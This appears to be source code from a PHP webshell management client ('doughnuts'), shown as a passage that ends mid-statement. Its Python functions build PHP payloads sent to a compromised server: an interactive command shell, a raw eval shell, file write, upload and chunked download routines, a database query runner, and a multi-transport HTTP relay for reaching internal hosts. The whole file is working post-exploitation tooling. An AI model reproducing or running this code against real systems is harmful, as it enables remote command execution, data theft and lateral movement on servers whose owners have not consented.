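def run(*commands):
    """
    shell

    Get a temporary shell of target system by system function or just run a shell command.
    """
    # One-shot mode: when arguments were typed after the command name, run them
    # once through get_system_code(), print the response text and stop.
    one_shot = str(value_translation(gget("raw_command_args")))
    if one_shot:
        res = send(get_system_code(one_shot))
        if not res:
            return
        print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n")
        return

    print(
        color.cyan(
            "Eenter interactive temporary shell...\n\nUse 'back' command to return doughnuts.\n"
        ))
    # The first request asks for "<whoami output>@<SERVER_NAME>|<cwd>".
    res = send(
        f'{get_system_code("whoami")}print("@".$_SERVER["SERVER_NAME"]."|".getcwd());'
    )
    # A failed request yields a falsy result here as it does everywhere else in
    # this function; reading .r_text from it would raise instead of aborting.
    if not res:
        return
    # Split on the first "|" only, so a working directory that itself contains
    # "|" is kept whole instead of raising on unpacking.
    user_host, separator, pwd = res.r_text.strip().partition("|")
    if not separator:
        print(color.red("\nUnexpected response, can not enter shell.\n"))
        return

    set_namespace("webshell", False, True)
    # Remember the active completion wordlist; it is restored in `finally`.
    wordlist = gget("webshell.wordlist")
    on_windows = is_windows()
    readline.set_wordlist(NEW_WINDOWS_WORDLIST if on_windows else NEW_UNIX_WORDLIST)
    user_host = user_host.replace("\r", "").replace("\n", "")
    try:
        while gget("loop"):
            # The prompt is assembled directly: response text is never used as
            # a %-format string, so a stray "%" in it cannot break the prompt.
            print(f"{pwd}> " if on_windows else f"{user_host}:{pwd}$ ", end="")
            command = str(value_translation(readline()))
            lowered = command.lower()
            if lowered in ('exit', 'quit', 'back'):
                print()
                break
            if command == '':
                print()
                continue
            # The working directory is tracked on the client and re-sent
            # (base64-encoded) with every request.
            b64_pwd = base64_encode(pwd)
            if lowered.startswith("cd ") and len(lowered) > 3:
                # Take the target from the input as typed: the lower-cased copy
                # is only for keyword matching and would corrupt a
                # case-sensitive path.
                path = base64_encode(command[3:].strip())
                res = send(
                    f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());'
                )
                if not res:
                    return
                pwd = res.r_text.strip()
            else:
                res = send(f'chdir(base64_decode(\'{b64_pwd}\'));' +
                           get_system_code(command))
                if not res:
                    return
                print("\n" + res.r_text.strip() + "\n")
    finally:
        readline.set_wordlist(wordlist)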
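def run(*commands):
    """
    webshell

    Get a webshell of target system or just run a webshell command.
    """
    # One-shot mode: arguments typed after the command name are sent as-is.
    command = gget("raw_command_args")
    if command:
        res = send(command)
        if not res:
            return
        print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n")
        return

    print(
        color.cyan(
            "Eenter interactive temporary webshell...\n\nUse 'back' command to return doughnuts.\n"
        ))
    res = send('print(getcwd());')
    # A failed request yields a falsy result here as it does everywhere else in
    # this function; reading .r_text from it would raise instead of aborting.
    if not res:
        return
    pwd = res.r_text.strip()

    set_namespace("webshell", False, True)
    # Remember the active completion wordlist; it is restored in `finally`.
    wordlist = gget("webshell.wordlist")
    readline.set_wordlist(NEW_WORDLIST)
    try:
        while gget("loop"):
            print(f"webshell:{pwd} >> ", end="")
            raw_line = readline(b"(")
            lowered = raw_line.lower()
            if lowered in ('exit', 'quit', 'back'):
                print()
                break
            if raw_line == '':
                print()
                continue
            data = base64_encode(raw_line)
            # The working directory is tracked on the client and re-sent
            # (base64-encoded) with every request.
            b64_pwd = base64_encode(pwd)
            if lowered.startswith("cd ") and len(lowered) > 3:
                # Take the target from the input as typed: the lower-cased copy
                # is only for keyword matching and would corrupt a
                # case-sensitive path.
                path = base64_encode(raw_line[3:].strip())
                res = send(
                    f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());'
                )
                if not res:
                    return
                pwd = res.r_text.strip()
            else:
                res = send(
                    f'eval("chdir(base64_decode(\'{b64_pwd}\'));eval(base64_decode(\'{data}\'));");'
                )
                if not res:
                    return
                print("\n" + res.r_text.strip() + "\n")
    finally:
        readline.set_wordlist(wordlist)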
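def run(web_file_path: str, editor: str = ""):
    """
    write

    Write files directly to the target system by notepad / vi as default or your own editor.

    eg: write {web_file_path} {editor=""}
    """
    # The content is edited in a scratch file with a random (uuid4) name inside
    # the configured download directory.
    file_name = str(uuid4())
    file_path = gget("webshell.download_path", "webshell")
    if not path.exists(file_path):
        makedirs(file_path)
    real_file_path = path.join(file_path, file_name).replace("\\", "/")
    try:
        open(real_file_path, 'a').close()
        open_editor(real_file_path, editor)
        with open(real_file_path, "r") as f:
            result = base64_encode(f.read())
        # NOTE(review): web_file_path is placed verbatim inside a single-quoted
        # PHP literal, so a quote character in the path ends the literal early;
        # only the content travels base64-encoded.
        res = send(
            f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
        )
        if not res:
            return
        text = res.r_text.strip()
        # The response is treated as success when it starts with a digit.
        if match(r"\d+", text):
            print(color.green(f"\nWrite {web_file_path} success.\n"))
        else:
            print(color.red(f"\nWrite {web_file_path} failed.\n"))
    finally:
        # Remove the scratch copy on every exit path: previously a failed
        # request (or an editor error) returned early and left the edited
        # content behind on the local disk.
        if path.exists(real_file_path):
            remove(real_file_path)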
def get_php(command, database):
    """Return the PHP text that runs one SQL statement and prints the rows.

    The statement is passed base64-encoded and decoded again on the PHP side.
    The emitted output is one line of column names followed by one line per
    row, every field terminated by ``*,``.  The template is chosen by the
    ``db_connect_type`` setting ("pdo" or "mysqli"); any other value yields an
    empty string.
    """
    driver = gget("db_connect_type", "webshell")
    connection_php = get_connect_code(dbname=database)
    encoded_sql = base64_encode(command)

    if driver == "pdo":
        template = """try{%s $r=$con->query(base64_decode('%s')); $rows=$r->fetchAll(PDO::FETCH_ASSOC); foreach($rows[0] as $k=>$v){ echo "$k*,"; } echo "\\n"; foreach($rows as $array){foreach($array as $k=>$v){echo "$v*,";};echo "\\n";} } catch (PDOException $e){ die("Connect error: ". $e->getMessage()); }"""
    elif driver == "mysqli":
        template = """%s $r=$con->query(base64_decode('%s')); $rows=$r->fetch_all(MYSQLI_ASSOC); foreach($rows[0] as $k=>$v){ echo "$k*,"; } echo "\\n"; foreach($rows as $array){foreach($array as $k=>$v){echo "$v*,";};echo "\\n";}"""
    else:
        # Unknown connection type: nothing to run.
        return ""
    return template % (connection_php, encoded_sql)
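def run(web_file_path: str):
    """
    write

    Write files directly to the target system by notepad/vi.

    eg: write {web_file_path}
    """
    # The scratch file takes the basename of the remote path and lives in the
    # configured download directory (":" replaced by "_").
    # NOTE(review): opening it with "w" truncates, and the cleanup below then
    # deletes, any existing local file of the same name in that directory.
    file_name = path.split(web_file_path)[1]
    file_path = gget("webshell.download_path", "webshell").replace(":", "_")
    if not path.exists(file_path):
        makedirs(file_path)
    real_file_path = path.join(file_path, file_name)
    try:
        with open(real_file_path, "w"):
            pass
        open_editor(real_file_path)
        with open(real_file_path, "r") as f:
            result = base64_encode(f.read())
        # NOTE(review): web_file_path is placed verbatim inside a single-quoted
        # PHP literal, so a quote character in the path ends the literal early;
        # only the content travels base64-encoded.
        res = send(
            f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));"
        )
        if not res:
            return
        text = res.r_text.strip()
        # Success means the response starts with a word character and is not
        # the literal "0".
        if match(r"\w+", text) and text != '0':
            print(color.green(f"\nWrite {web_file_path} success.\n"))
        else:
            print(
                color.red(f"\nWrite {web_file_path} failed.") +
                color.yellow("\n\nResponse:") + f"\n{text}\n")
    finally:
        # Remove the scratch copy on every exit path: previously a failed
        # request (or an editor error) returned early and left the edited
        # content behind on the local disk.
        if path.exists(real_file_path):
            remove(real_file_path)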
def get_php(web_file_path: str, force: bool):
    """Return the PHP text that stores an uploaded file at *web_file_path*.

    The destination travels base64-encoded.  The PHP prints "exist" when
    *force* is false and the destination is already present; otherwise it
    moves the multipart field named "file" into place and prints "success".
    """
    encoded_target = base64_encode(web_file_path)
    # PHP boolean literal: "true" means an existing file must not be replaced.
    keep_existing = str(not force).lower()
    template = """if (isset($_FILES)){ if (%s and file_exists(base64_decode("%s"))){ print("exist"); } else if (move_uploaded_file($_FILES["file"]["tmp_name"], base64_decode("%s"))){ print("success"); } }"""
    return template % (keep_existing, encoded_target, encoded_target)
def get_php_force(web_file_path: str, force):
    """Return the PHP text that removes *web_file_path* ahead of an overwrite.

    The PHP prints "not writable" or "exist" when it declines to act and
    otherwise unlinks the path.  The path travels base64-encoded.
    """
    encoded_target = base64_encode(web_file_path)
    # PHP boolean literal: "true" means an existing file must not be replaced.
    keep_existing = str(not force).lower()
    # NOTE(review): the is_writable() test wraps the already-encoded value in
    # base64_encode() while the other three uses call base64_decode(); this
    # looks like a typo and would make the test examine a different string
    # than the path - confirm before relying on the "not writable" answer.
    template = """if (not is_writable(base64_encode("%s"))) { echo "not writable"; } else if (%s and file_exists(base64_decode("%s"))){ print("exist"); } else{ unlink(base64_decode("%s")); }"""
    return template % (encoded_target, keep_existing, encoded_target,
                       encoded_target)
def get_php(web_file_path: str):
    """Return the PHP text that streams *web_file_path* back as an attachment.

    The PHP sets a Content-type of ``application/x-<extension>`` and a
    Content-Disposition header carrying the basename, then calls readfile().
    A missing file produces no output.  The path travels base64-encoded.
    """
    encoded_target = base64_encode(web_file_path)
    template = """function download($fd){ if (@file_exists($fd)){ $fileinfo = pathinfo($fd); header("Content-type: application/x-" . $fileinfo["extension"]); header("Content-Disposition: attachment; filename=" . $fileinfo["basename"]); @readfile($fd); } } download(base64_decode("%s")); """
    return template % encoded_target
def get_data_php(web_file_path: str, offset: int, blocksize: int):
    """Return the PHP text that reads one block of *web_file_path*.

    The PHP seeks to *offset*, reads *blocksize* bytes, and echoes them
    deflated and base64-encoded.  Nothing is echoed when the file cannot be
    opened.  The path travels base64-encoded; the two numbers are formatted
    with ``%s``.
    """
    encoded_target = base64_encode(web_file_path)
    template = """function download($file, $offset, $size) { $fp = @fopen($file,'rb'); if ($fp){ fseek($fp, $offset); echo base64_encode(gzdeflate(fread($fp, $size))); } } download(base64_decode("%s"), %s, %s); """
    return template % (encoded_target, offset, blocksize)
def get_php_decode(web_file_path: str, total_number: int):
    """Return the PHP text that reassembles an upload from its chunk files.

    The PHP concatenates ``<path>.tmp0`` .. ``<path>.tmp<total_number - 1>``,
    deleting each chunk as it is read, and stops at the first empty chunk.
    When all chunks were read it base64-decodes the joined text, strips 10
    leading and 8 trailing bytes before inflating, writes the result to
    ``<path>`` and echoes "success " followed by the MD5 of the data.
    """
    encoded_target = base64_encode(web_file_path)
    template = """function gzipdecode($data) { return gzinflate(substr($data,10,-8)); } $p=base64_decode("%s"); $data=""; $f=true; for($i=0;$i<%s;$i++){ $pp="$p.tmp$i";if(filesize($pp)!==0){ $data .= file_get_contents($pp);unlink($pp); } else { $f=false; break; } } if($f){ $data=gzipdecode(base64_decode($data)); file_put_contents($p, $data); if(file_exists($p) && filesize($p) !== 0){echo "success ".md5($data);} }"""
    return template % (encoded_target, total_number)
def get_php_decode(web_file_path: str, number: int):
    """Return the PHP text that reassembles an upload chunk by chunk.

    Each ``<path>.tmp<i>`` for i below *number* is base64-decoded, inflated,
    appended to ``<path>`` and then deleted; the loop stops at the first empty
    chunk.  "success" is echoed when no chunk was empty and the destination
    exists with a non-zero size.
    """
    encoded_target = base64_encode(web_file_path)
    # NOTE(review): the guard in the template reads `if (fp)` without the `$`
    # sigil although every other reference is `$fp`, and `fclose($fp)` sits
    # outside that guard - both look unintended; confirm against the PHP
    # versions this is expected to run on.
    template = """ $p=base64_decode("%s"); $data=""; $f=true; $fp=@fopen($p, 'wb'); if (fp){ for($i=0;$i<%s;$i++){ $pp="$p.tmp$i"; if(filesize($pp)!==0){ $data=gzinflate(base64_decode(file_get_contents($pp))); fwrite($fp, $data); fflush($fp); unlink($pp); } else { $f=false; break; } } } fclose($fp); if($f){ if(file_exists($p) && filesize($p) !== 0){echo "success";} }"""
    return template % (encoded_target, number)
def get_php_clean(web_file_path: str, number: int):
    """Return the PHP text that deletes the chunk files of an upload.

    The PHP unlinks ``<path>.tmp0`` .. ``<path>.tmp<number - 1>``.  The path
    travels base64-encoded.
    """
    encoded_target = base64_encode(web_file_path)
    template = """for($i=0;$i<%s;$i++){ unlink(base64_decode("%s").".tmp$i"); }"""
    return template % (number, encoded_target)
def get_php_upload(web_file_path: str, data: str, number: int):
    """Return the PHP text that writes one upload chunk to disk.

    The chunk is stored as ``<web_file_path>.tmp<number>`` and "success" is
    echoed when the resulting file is not empty.
    """
    chunk_name = web_file_path + ".tmp%s" % number
    encoded_chunk_path = base64_encode(chunk_name)
    # NOTE(review): `data` is placed verbatim inside a double-quoted PHP
    # literal; presumably the caller passes base64 text - confirm, since `"`,
    # `$` or `\` in it would change the statement.
    template = """$p=base64_decode("%s");file_put_contents($p, "%s");if(filesize($p) !== 0){echo "success";}"""
    return template % (encoded_chunk_path, data)
def get_php(request_target, request_method, request_redirect_method, request_data, request_params, request_cookie, redirect_auto, redirect_cookie_use, timeout, type):
    """Return, base64-encoded, the PHP text of a server-side request relay.

    The ten arguments fill, in this order, the PHP variables $REQUEST_URL,
    $REQUEST_METHOD, $REQUEST_REDIRECT_METHOD, $REQUEST_DATA, $REQUEST_PARAMS,
    $REQUEST_COOKIE, $REDIRECT_AUTO, $REDIRECT_COOKIE_USE, $TIMEOUT and $TYPE.
    Note that the %-tuple passes request_data before request_params.

    The PHP defines a class ``Agent`` and echoes an instance of it.  Its
    ``__toString`` picks the transport from $TYPE: 1 = raw socket
    (getContent_sock), 2 = file_get_contents with a stream context
    (getContent_fg), 3 = curl (getContent_c), 4 = a bare file_get_contents()
    on the URL (get_content).  Only GET and POST are in the allowed-method
    list.  With auto-redirect on, 3xx answers are followed by the matching
    get302_* method.

    For types 1-3 the body passes through get_element(), which inlines the
    linked CSS/JS it finds and appends an HTML comment holding
    <CurrentUrl>, <CurrentCookie>, <CurrentHeader> and <CurrentStatus> tags
    (values base64-encoded).  That trailer is a fixed marker in every relayed
    response.
    """
    # English for the comments embedded in the template (they are part of the
    # string and are left untouched): proxy target; proxy request method;
    # request method used on redirect; POST data; GET data; COOKIE data;
    # follow redirects automatically; use the cookie obtained on redirect;
    # timeout; "four types: the first three are the socket /
    # file_get_contents / curl relays, the last is a plain file_get_contents(),
    # which also accepts PHP stream wrappers".
    #
    # NOTE(review): the six string arguments are substituted unescaped into
    # quoted PHP literals, so a quote character in any of them changes the
    # generated code.  redirect_auto, redirect_cookie_use and type go through
    # %d and timeout through %f, so they must be numeric.
    # NOTE(review): the parameter name `type` shadows the builtin inside this
    # function; it cannot be renamed without changing the keyword interface.
    # NOTE(review): in the template, get_host() tests isset($url_group['scheme'])
    # and then uses the scheme in the *else* branch, and the Content-Type
    # header uses `isset($type) ? '' : $type` - both conditions look inverted;
    # confirm.
    return base64_encode(""" # 代理目标 $REQUEST_URL= "%s"; # 代理请求方法 $REQUEST_METHOD= '%s'; # 遇到跳转时的请求方法 $REQUEST_REDIRECT_METHOD = '%s'; # POST数据 $REQUEST_DATA='%s'; # GET数据 $REQUEST_PARAMS='%s'; # COOKIE数据 $REQUEST_COOKIE='%s'; # 是否自动跳转 $REDIRECT_AUTO = %d; # 跳转时使用自动获取的COOKIE $REDIRECT_COOKIE_USE = %d; # 超时时间 $TIMEOUT = %f; # 有4种。 # 前3种分别对应 socket file_get_contents curl 的内网代理 # 最后1种是单纯的file_get_contents(),可以玩php伪协议 $TYPE = %d; class Agent{ private $page_content; private $type; private $timeout; private $redirect_auto; private $redirect_cookie_use; private $request_method; private $request_redirect_method; private $request_allowed_method; private $request_params; private $request_data; private $request_cookie; private $request_url; private $request_url_group; private $current_url; private $header_data; private function get_cookie($header_lines){ foreach ($header_lines as $line) { preg_match_all('/set-cookie:(.*)/i', $line, $cookie); if (@$cookie[1][0] != NULL) { return trim($cookie[1][0]); } } return false; } private function get_redirect($header_lines){ foreach($header_lines as $line){ preg_match_all('/location:(.*)/i',$line,$url); if(@$url[1][0]!=NULL){ return trim($url[1][0]); } } return false; } private function get_params($params){ $re_params=[]; if($params == '') return [''=>'']; foreach(explode('&',$params) as $line){ $key_value=explode('=',$line); $re_params[urldecode(isset($key_value[0])?$key_value[0]:'')]=urldecode(isset($key_value[1])?$key_value[1]:''); } return $re_params; } private function get_query($params_group){ return isset($params_group['']) and $params_group['']=='' ? 
'' : http_build_query($params_group); } private function url_cut($url){ return parse_url($url); } private function get_host($url){ $url_group=$this->url_cut($url); if(isset($url_group['scheme'])){ return $url; }else{ return $url_group['scheme'].'://'.$url_group['host'].(isset($url_group['port'])?'':':'.$url_group['port']); } } private function get_element($host,$body){ preg_match_all("/<link[\s\S]*?href=['\\"](.*?[.]css.*?)[\\"'][\s\S]*?>/i", $body, $css); preg_match_all("/<script[\s\S]*?src=['\\"](.*?[.]js.*?)[\\"'][\s\S]*?>/i", $body, $js); foreach ($css[1] as $css_url) { $body .= "<style>".@file_get_contents(strpos($css_url, 'http://') == false ? $host . '/' . $css_url:$css_url)."</style>"; } foreach ($js[1] as $js_url) { $body .= "<script>" . @file_get_contents(strpos($js_url, 'http://') == false ? $host . '/' . $js_url : $js_url) . "</script>"; } $body.="\\n<!-- \\n<CurrentUrl>".base64_encode($this->current_url)."</CurrentUrl>"; $body.="<CurrentCookie>".base64_encode($this->request_cookie)."</CurrentCookie>"; $body.="<CurrentHeader>"; if(is_array($this->header_data)){ foreach($this->header_data as $tag){ if($tag){ $body.=base64_encode("[{$tag}]")."|"; } } } $body.="</CurrentHeader>"; $body.="<CurrentStatus>success</CurrentStatus>\\n -->"; return $body; } private function get302_socket($url) { try { $result=""; $url_group = $this->url_cut($url); $fp = @fsockopen($url_group['host'], isset($url_group['port']) ? $url_group['port'] : (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : 80), $erro, $errostr, $this->timeout); if (!$fp) { throw new Exception("Can't connect```"); } else { if(in_array($this->request_redirect_method,$this->request_allowed_method)){ if ($this->request_redirect_method === 'POST') { $r = 'POST ' . $url_group['path'] . " HTTP/1.1\\r\\n"; $type = "application/x-www-form-urlencoded"; $len = 0; } else { $r = 'GET ' . $url_group['path'] . " HTTP/1.1\\r\\n"; $type = ''; $len = 0; } } $r .= "Host: " . $url_group['host'] . 
':' . (isset($url_group['port']) ? $url_group['port'] : (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80')) . "\r\n"; $r .= $this->request_cookie ? "Cookie: " . $this->request_cookie . "\\r\\n":''; $r .= "Content-Type: " . $type . "\\r\\n"; $r .= "Content-Length: " . $len . "\\r\\n"; $r .= "Connection: close\\r\\n\\r\\n"; fputs($fp, $r); while (!feof($fp)) { $result .= fgets($fp, 1024); } fclose($fp); if ($result) { list($header, $body) = explode("\\r\\n\\r\\n" , $result, 2); preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", explode("\\r\\n", $header)[0], $code); $header = explode("\\r\\n",$header); $this->header_data = $header; if (300 <= $code[1] and $code[1] < 400) { $redirect_url = $this->get_redirect($header); $cookie = $this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie; if($this->redirect_cookie_use and $cookie != ''){ $this->request_cookie = $cookie; } if(stripos($redirect_url,'http://') == false){ if($redirect_url[0] == '/'){ $redirect_url = $this->get_host($url).$redirect_url; }else{ $redirect_url = $url_group['scheme'].'://'.$url_group['host']. ':' . (isset($url_group['port']) ? $url_group['port'] : '80').(isset($url_group['path'])?($url_group['path'] == '/'?'/':substr($url_group['path'],0,strripos($url_group['path'],'/') + 1)):'/').$redirect_url; } } $this->current_url = $redirect_url; return $this->redirect_auto ? $this->get302_socket($redirect_url) : $body; } else { return $body; } } } } catch (Exception $e) { die("File_Get_Contents_Redirect_error #:" . $e); } } private function get302_fg($url) { try { $url_group = $this->url_cut($url); if (in_array($this->request_redirect_method, $this->request_allowed_method)) { if ($this->request_redirect_method === 'POST') { $type = "application/x-www-form-urlencoded"; } } $opts = array( 'http' => array( 'method' => $this->request_method, 'timeout' => $this->timeout, 'header' => 'Content-Type: ' . (isset($type) ? '' : $type) . "\\r\\n" . 'Content-Length: 0' . 
"\\r\\n". ($this->request_cookie ? 'Cookie: ' . $this->request_cookie . "\\r\\n":'' ) ) ); $context = stream_context_create($opts); $body = @file_get_contents($url, false, $context); $result = $http_response_header; $this->header_data = $result; preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", $result[0], $code); if (300 <= $code[1] and $code[1] < 400) { $redirect_url = $this->get_redirect($result); $cookie = $this->get_cookie($result) ? $this->get_cookie($result) : $this->request_cookie; if($this->redirect_cookie_use and $cookie != ''){ $this->request_cookie = $cookie; } if(stripos($redirect_url,'http://') == false){ if($redirect_url[0] == '/'){ $redirect_url = $this->get_host($url).$redirect_url; }else{ $redirect_url = $url_group['scheme'].'://'.$url_group['host']. ':' . (isset($url_group['port']) ? $url_group['port'] : '80').(isset($url_group['path'])?($url_group['path'] == '/'?'/':substr($url_group['path'],0,strripos($url_group['path'],'/') + 1)):'/').$redirect_url; } } $this->current_url = $redirect_url; return $this->redirect_auto ? $this->get302_fg($redirect_url) : ($body === false ? "Can't fetch contents```" : $body); } else { return $body === false ? "Can't fetch contents```" : $body; } } catch (Exception $e) { die("File_Get_Contents_Redirect_error #:" . 
$e); } } private function get302_c($url){ try{ $r = curl_init(); $url_group = $this->url_cut($url); curl_setopt($r, CURLOPT_URL, $url); curl_setopt($r, CURLOPT_RETURNTRANSFER, 1); curl_setopt($r, CURLOPT_CONNECTTIMEOUT, $this->timeout); curl_setopt($r, CURLOPT_HEADER, true); if($this->request_cookie){ curl_setopt($r,CURLOPT_COOKIE,$this->request_cookie); } if(in_array($this->request_redirect_method,$this->request_allowed_method)){ if ($this->request_redirect_method === 'POST') { curl_setopt($r, CURLOPT_POST, 1); } } $result = curl_exec($r); if($result){ $header_size = curl_getinfo($r, CURLINFO_HEADER_SIZE); $header = explode("\\r\\n", substr($result, 0, $header_size)); $body = substr($result, $header_size); $status_code = intval(curl_getinfo($r, CURLINFO_HTTP_CODE)); $this->header_data = $header; curl_close($r); if (300 <= $status_code and $status_code < 400) { $redirect_url = $this->get_redirect($header); $cookie = $this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie; if($this->redirect_cookie_use and $cookie != ''){ $this->request_cookie = $cookie; } if(stripos($redirect_url,'http://') == false){ if($redirect_url[0] == '/'){ $redirect_url = $this->get_host($url).$redirect_url; }else{ $redirect_url = $url_group['scheme'].'://'.$url_group['host']. ':' . (isset($url_group['port']) ? $url_group['port'] : '80').(isset($url_group['path'])?($url_group['path'] == '/'?'/':substr($url_group['path'],0,strripos($url_group['path'],'/') + 1)):'/').$redirect_url; } } $this->current_url = $redirect_url; return $this->redirect_auto ? $this->get302_c($redirect_url) : $body; }else{ return $body; } } } catch(Exception $e){ die("CURL_Redirect_error #:" . $e); } } public function getContent_sock() { try { $result = ''; $fp = @fsockopen($this->request_url_group['host'], isset($this->request_url_group['port']) ? $this->request_url_group['port'] : 80, $erro, $errostr, $this->timeout); if (!$fp) { var_dump($this->request_url_group['scheme'] . '://' . 
$this->request_url_group['host'] . (isset($this->request_url_group['path']) ? $this->request_url_group['path'] : '/' . '?' . $this->get_query($this->request_params))); var_dump(isset($this->request_url_group['port']) ? $this->request_url_group['port'] : 80); throw new Exception("Can't connect```"); } else { if (in_array($this->request_method, $this->request_allowed_method)) { if ($this->request_method === 'POST') { $r = 'POST ' . (isset($this->request_url_group['path']) ? $this->request_url_group['path'] : '/') . '?' . $this->get_query($this->request_params) . " HTTP/1.1\r\n"; $type = "application/x-www-form-urlencoded"; $len = strlen($this->get_query($this->request_data)); } else { $r = 'GET ' . (isset($this->request_url_group['path']) ? $this->request_url_group['path'] : '/') . '?' . $this->get_query($this->request_params) . " HTTP/1.1\r\n"; $type = ''; $len = 0; } } $r .= "Host: " . $this->request_url_group['host'] . ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80') . "\r\n"; $r .= $this->request_cookie ? "Cookie: " . $this->request_cookie . "\\r\\n" : ''; $r .= "Content-Type: " . $type . "\\r\\n"; $r .= "Content-Length: " . $len . "\\r\\n"; $r .= "Connection: close\\r\\n"; $r .= "\\r\\n" . $this->get_query($this->request_data); fputs($fp, $r); while (!feof($fp)) { $result .= fgets($fp, 1024); } fclose($fp); if ($result) { list($header, $body) = explode("\\r\\n\\r\\n" , $result, 2); preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", explode("\\r\\n", $header)[0], $code); $header = explode("\\r\\n",$header); $this->header_data = $header; if (300 <= $code[1] and $code[1] < 400) { $redirect_url = $this->get_redirect($header); $cookie = $this->redirect_cookie_use ? ($this->get_cookie($header) ? 
$this->get_cookie($header) : $this->request_cookie) : ''; if($this->redirect_cookie_use and $cookie != ''){ $this->request_cookie = $cookie; } if(stripos($redirect_url,'http://') == false){ if($redirect_url[0] == '/'){ $redirect_url = $this->get_host($this->request_url).$redirect_url; }else{ $redirect_url = $this->request_url_group['scheme'].'://'.$this->request_url_group['host']. ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80').(isset($this->request_url_group['path'])?($this->request_url_group['path'] == '/'?'/':substr($this->request_url_group['path'],0,strripos($this->request_url_group['path'],'/') + 1)):'/').$redirect_url; } } $this->current_url = $redirect_url; return $this->redirect_auto ? $this->get302_socket($redirect_url) : $body; } else { return $body; } } } } catch (Exception $e) { die("SOCKET_error #:" . $e); } } public function getContent_fg(){ try{ if(in_array($this->request_method,$this->request_allowed_method)){ if($this->request_method === 'POST'){ $type = "application/x-www-form-urlencoded"; } } $opts = array( 'http'=>array( 'method' => $this->request_method, 'content' => $this->get_query($this->request_data), 'timeout' => $this->timeout, 'header' => 'Content-Type: '.(isset($type)?'':$type)."\\r\\n". 'Content-Length: '.strlen($this->get_query($this->request_data))."\\r\\n". ($this->request_cookie ? 'Cookie: ' . $this->request_cookie . "\\r\\n" : '') ) ); $context = stream_context_create($opts); $body = @file_get_contents($this->request_url.'?'.$this->get_query($this->request_params),false,$context); $result = $http_response_header; $this->header_data = $result; preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", $result[0], $code); if (300 <= $code[1] and $code[1] < 400) { $redirect_url = $this->get_redirect($result); $cookie = $this->redirect_cookie_use ? ($this->get_cookie($result) ? 
$this->get_cookie($result) : $this->request_cookie) : ''; if($this->redirect_cookie_use and $cookie != ''){ $this->request_cookie = $cookie; } if(stripos($redirect_url,'http://') == false){ if($redirect_url[0] == '/'){ $redirect_url = $this->get_host($this->request_url).$redirect_url; }else{ $redirect_url = $this->request_url_group['scheme'].'://'.$this->request_url_group['host']. ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80').(isset($this->request_url_group['path'])?($this->request_url_group['path'] == '/'?'/':substr($this->request_url_group['path'],0,strripos($this->request_url_group['path'],'/') + 1)):'/').$redirect_url; } } $this->current_url = $redirect_url; return $this->redirect_auto ? $this->get302_fg($redirect_url) : ($body===false?"Can't fetch contents```":$body); }else{ return $body === false ? "Can't fetch contents```" : $body; } } catch(Exception $e){ die("File_Get_Contents_error #:" . $e); } } public function getContent_c(){ try{ if(in_array($this->request_method,$this->request_allowed_method)){ $curl = curl_init(); curl_setopt($curl,CURLOPT_URL,$this->request_url.'?'.$this->get_query($this->request_params)); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,$this->timeout); curl_setopt($curl,CURLOPT_HEADER,true); if($this->request_cookie){ curl_setopt($curl,CURLOPT_COOKIE,$this->request_cookie); } if (in_array($this->request_method, $this->request_allowed_method)) { if($this->request_method === 'POST'){ curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,$this->get_query($this->request_data)); } } $result = curl_exec($curl); if($result){ $header_size = curl_getinfo($curl,CURLINFO_HEADER_SIZE); $header = explode("\\r\\n",substr($result,0,$header_size)); $body = substr($result,$header_size); $status_code = intval(curl_getinfo($curl,CURLINFO_HTTP_CODE)); $this->header_data = $header; curl_close($curl); if(300 <= $status_code and $status_code < 400){ 
$redirect_url = $this->get_redirect($header); $cookie = $this->redirect_cookie_use ? ($this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie) : ''; if($this->redirect_cookie_use and $cookie != ''){ $this->request_cookie = $cookie; } if(stripos($redirect_url,'http://') == false){ if($redirect_url[0] == '/'){ $redirect_url = $this->get_host($this->request_url).$redirect_url; }else{ $redirect_url = $this->request_url_group['scheme'].'://'.$this->request_url_group['host']. ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80').(isset($this->request_url_group['path'])?($this->request_url_group['path'] == '/'?'/':substr($this->request_url_group['path'],0,strripos($this->request_url_group['path'],'/') + 1)):'/').$redirect_url; } } $this->current_url = $redirect_url; return $this->redirect_auto ? $this->get302_c($redirect_url) : $body; }else{ return $body; } } } } catch (Exception $e) { die("CURL_error #:" . $e); } } public function get_content(){ $contents = @file_get_contents($this->request_url); return $contents === false ? 
"Can't fetch contents```" : $contents; } public function __construct($request_url,$request_method,$request_redirect_method,$redirect_auto,$redirect_cookie_use,$params,$data,$cookie,$timeout,$type){ $this->request_url = $request_url; $this->request_url_group = $this->url_cut($request_url); $this->current_url = $request_url; $this->request_method = $request_method; $this->request_redirect_method = $request_redirect_method; $this->redirect_auto = $redirect_auto; $this->redirect_cookie_use = $redirect_cookie_use; $this->request_params = $this->get_params($params); $this->request_data = $this->get_params($data); $this->request_cookie = $cookie; $this->request_allowed_method = ['GET','POST']; $this->timeout = $timeout; $this->type = $type; } public function __toString(){ switch($this->type){ case 1: $this->page_content = $this->get_element($this->request_url,$this->getContent_sock()); break; case 2: $this->page_content = $this->get_element($this->request_url, $this->getContent_fg()); break; case 3: $this->page_content = $this->get_element($this->request_url, $this->getContent_c()); break; case 4: $this->page_content = $this->get_content(); break; } return $this->page_content; } } $this_request = new 